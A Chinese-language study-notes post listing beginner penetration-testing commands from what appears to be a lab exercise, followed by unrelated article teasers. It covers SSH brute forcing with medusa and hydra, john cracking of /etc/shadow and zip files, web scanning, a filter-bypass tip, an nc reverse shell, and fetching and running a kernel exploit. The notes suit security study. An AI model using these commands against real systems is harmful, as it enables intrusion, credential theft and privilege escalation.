安防初识命令【学习笔记】

1、美杜莎爆破

medusa  -M  ssh   -h  192.168.42.135 -u guest  -P  top1000.txt   -t 8

2、passwd文件与shadow文件

root:x:0:0:root:/root:/usr/bin/zsh
用户名:密码:uid:gid:描述性信息:主目录:默认shell  (nologin为禁止登陆)

root:$y$j9T$qOgIxPawKD/eOVjjZBtAJ1$vHC6fSvBC3KDEINrK1u5Jb4Lgtv4NdMUGgXmUTl0l/A:19570:0:99999:7:::
用户名:
密码:
最近一次修改密码的时间(修改时间-1970/1/1的天数):
修改密码的间隔时间(在该时间段内不允许修改密码):
密码有效期:
密码过期前的警告提醒天数:
密码过期后宽限多少天:
账号失效时间:
保留字段

$1$     MD5
$y$    yescrypt
$5$    SHA256
$6$    SHA512

3、john解密

john  /etc/shadow  --format=crypt

zip压缩包密码解密
zip2john  test.zip > test_pass.txt

john test_pass.txt

4、web服务器扫描之nikto
nikto--------web安全扫描工具

nikto  -h http://192.168.42.141

dev_shell.php  php+mysql开源框架后台管理界面

/bin目录下存在大部分内核指令,可直接通过/bin/+命令绕过大多数简单的命令字符过滤

5、利用nc进行反弹shell

nc -lvp 6666  服务端开放并监听通信端口

nc -e /bin/bash  192.168.42.134 6666  客户端连接后启动shell

利用python模块让nc反弹shell 美化界面
python -c  “import pty;pty.spawn('/bin/bash')"        pty-----伪终端实用程序

6、gpg文件的解密

gpg --batch --passphrase  密钥 -d  需要解密的文件

gpg最简单的用法
gpg -o 解密后存储的文件 -d 需要解密的文件

7、dirb----web目录文件扫描

dirb  http://192.168.42.142

8、海德拉爆破

hydra  -l potato -P webshell.txt 192.168.42.142 -s 7120 -vV -f ssh

ssh potato@192.168.42.142 -p 7120

uname -a  发现版本较低

9、查找对应内核版本存在的漏洞

searchsploit   ubuntu 3.13.0
指定漏洞所在的路径

searchsploit  -p  37292.c

wget  http://192.168.42.133/37292.c

gcc 37292.c -o exp

chmod 777 exp

./exp

10、信息收集--永恒之眼

nmap  192.168.42.0/24

nmap  -A 192.168.42.142 -p-
 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/103534.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

c++ 静态变量 静态函数

1. 静态成员变量 1.1 简介 静态成员变量(static member variable)是属于类而不是类的实例的成员变量。它们在类的所有实例之间共享,只有一个副本存在于内存中。静态成员变量使用 static 关键字进行声明和定义,并且必须在类的外部…

网工笔记整理:策略工具Filter-policy的使用

一、概述 Filter-Policy(过滤-策略)是一个很常用的路由信息过滤工具,能够对接收、发布、引入的路由进行过滤,可应用于IS-IS、OSPF、BGP等协议。 Filter-policy在距离矢量路由协议中的应用 filter-policy import:不发…

Springboot引入jasypt实现加解密

一、前言 有时在实际应用中,我们可能需要使用到一些秘钥,针对某些资源文件中的内容通常情况下是明文显示,安全性就比较低一些,比如redis登陆密码以及第三方的密钥等等一览无余,这时就可以使用jasypt来实现加解密。 二…

提高企业竞争力的秘密武器—奇高智能呼叫中心系统

在现代商业竞争日益激烈的时代,企业如何提高自身的竞争力是所有企业家和管理者必须思考的问题。而奇高智能呼叫中心系统可以说是提高企业竞争力的秘密武器之一。 奇高智能呼叫中心系统作为一种基于云计算技术的新型客户服务系统,具有自动分配、多渠道服…

行业追踪,2023-10-11

自动复盘 2023-10-11 凡所有相,皆是虚妄。若见诸相非相,即见如来。 k 线图是最好的老师,每天持续发布板块的rps排名,追踪板块,板块来开仓,板块去清仓,丢弃自以为是的想法,板块去留让…

Linux进程概念(二)--进程状态进程优先级

继上回书Linux进程概念(一),我们初步了解了进程的一些相关概念以及如何创建和查看进程,对其原理和一些进程现象进行了分析和解释,那么今天,我们学习下一个进程知识-进程概念。 目录 1.操作系统的进程状态 …

Java List 中存不同的数据类型

在最近的实践中&#xff0c;有人突然问了一个问题&#xff1a; 在 Java 的 List 中可以存不同的数据类型吗&#xff1f; 这个问题突然给问到了&#xff0c;我们都知道 Java 中的 List 中存的是对象&#xff0c;通常我们定义都会这样的定义&#xff1a; List<String> t…

SRC实战-cookie注入漏洞

目录 谷歌语法-信息收集 cookie注入 实战演示 信息收集 SQL注入判断 查找字段数 爆破表名 输出结果 总结 本文由掌控安全学院 - 小博 投稿 谷歌语法-信息收集 1.查找带有ID传参的网站&#xff08;可以查找sql注入漏洞&#xff09; inurl:asp idxx 2.查找网站后台&…

游戏行业该如何应对DDoS攻击问题呢?

当发现游戏服务器有受到攻击情况&#xff0c;可以通过添加防御类产品如:高防IP来解决遇到的攻击情况&#xff0c;通过DNS域名解析&#xff0c;高防IP将替代源站服务器IP对外提供在线互联网业务&#xff0c;所有业务流量都将牵引至高防IP上进行清洗&#xff0c;干净流量回注给源…

AlGaN/GaN结构的氧基数字蚀刻

引言 宽带隙GaN基高电子迁移率晶体管(HEMTs)和场效应晶体管(fet)能够提供比传统Si基高功率器件更高的击穿电压和电子迁移率。常关GaN非常需要HEMT来降低功率并简化电路和系统架构&#xff0c;这是GaN HEMT技术的主要挑战之一。凹进的AlGaN/GaN结构是实现常关操作的有用选择之一…

华为云云耀云服务器L实例评测|华为云耀云服务器L实例评测包管理工具安装软件(六)

七、华为云耀云服务器L实例评测包管理工具安装软件&#xff1a; 根据企业级项目架构图所示&#xff0c;本章主要是安装公司企业项目的基本环境LNMP&#xff0c;相关的包管理器Composer、Node、Npm、Yarn安装&#xff0c;评测一下包管理工具安装软件是否存在问题&#xff0c;如果…

区块链技术在供应链管理中的创新应用

区块链技术以其独特的不可篡改和透明性特点&#xff0c;正在逐步改变供应链管理的传统模式。本文将探讨区块链技术在供应链管理中的创新应用及其带来的效益。 区块链技术的出现为许多行业带来了创新的可能&#xff0c;其中之一就是供应链管理。通过区块链技术&#xff0c;企业可…

RS485电路设计

引言 今天学习RS485电路的设计。 首先先来了解一下RS485电路是什么干什么。 RS485是一种串行通信协议&#xff0c;也是一种电气标准。它可以用于在远距离范围内传送数据&#xff0c;最长传输距离可以达到1200米&#xff0c;可以支持多个设备同时通信。RS485通常应用于工业自…

空间精密定位与导航VR模拟培训软件突破了时空限制

随着科技的飞速发展&#xff0c;测绘遥感技术逐渐成为地理信息获取的重要手段。然而&#xff0c;传统的测绘展示方式存在着诸多局限性&#xff0c;无法充分展现出测绘数据的精细化和多元化&#xff0c;成为为解决这一难题的有效途径。 测绘工程专业作为时下就业率爆棚的专业之一…

tomcat 问题

一、start up.bat 闪退 在命令窗口run 看看是缺少了哪个环境变量 二、控制台输出乱码 logging.properties 底部添加 java.util.logging.ConsoleHandler.encoding GBK 三、缓存不足 context.xml配置 <Resources cachingAllowed"false" cacheMaxSize"100…

学习笔记|串口与PC通信的接线|移植驱动程序|串口通信实战|STC32G单片机视频开发教程(冲哥)|第二十一集(上):串口与PC通信

目录 1.串口与PC通信的接线芯片与芯片之间的通讯&#xff1a;芯片与电脑之间的通讯&#xff1a; 2.利用实验箱示例代码移植驱动程序3.串口通信实战最小工程代码移植编译提示错误&#xff1a;undefined identifier 1.串口与PC通信的接线 上节试验是串口和电脑进行一个通信&…

C++day07(auto、lambda、类型转换、STL、文件操作)

今日任务 试编程&#xff1a; 封装一个学生的类&#xff0c;定义一个学生这样类的vector容器, 里面存放学生对象&#xff08;至少3个&#xff09; 再把该容器中的对象&#xff0c;保存到文件中。 再把这些学生从文件中读取出来&#xff0c;放入另一个容器中并且遍历输出该容…

振弦采集仪应用水坝安全监测的方案

振弦采集仪应用水坝安全监测的方案 随着工业化和城市化的快速发展&#xff0c;水资源的开发和利用越来越广泛。由于水坝在水利工程中起着至关重要的作用&#xff0c;因此对水坝进行安全监测变得越来越必要。为了实现对水坝的安全监测&#xff0c;振弦采集仪可以作为一种有效的…

ideal远程Debug部署在服务器上的服务详解

ideal远程Debug部署在服务器上的服务详解 一 简介二 ideal配置步骤第一步&#xff1a;点击Edit Configurations选项添加远程连接第二步&#xff1a;配置Remote JVM debug参数第三步&#xff1a;服务的启动参数中添加第二步生成的命令并重新启动服务第四步&#xff1a;ideal启动…

面经|快手经营分析二面

1.自我介绍 2.组织架构属于中台部门还是业务部门分析岗&#xff1f; 3.组织里面有BP的角色吗&#xff1f;BP主要负责做什么&#xff1f; 回答&#xff1a;分业务方向&#xff0c;没有BP 4.项目类和数据支持类的工作占比是都少&#xff1f; 回答&#xff1a;项目类70%&#xff0…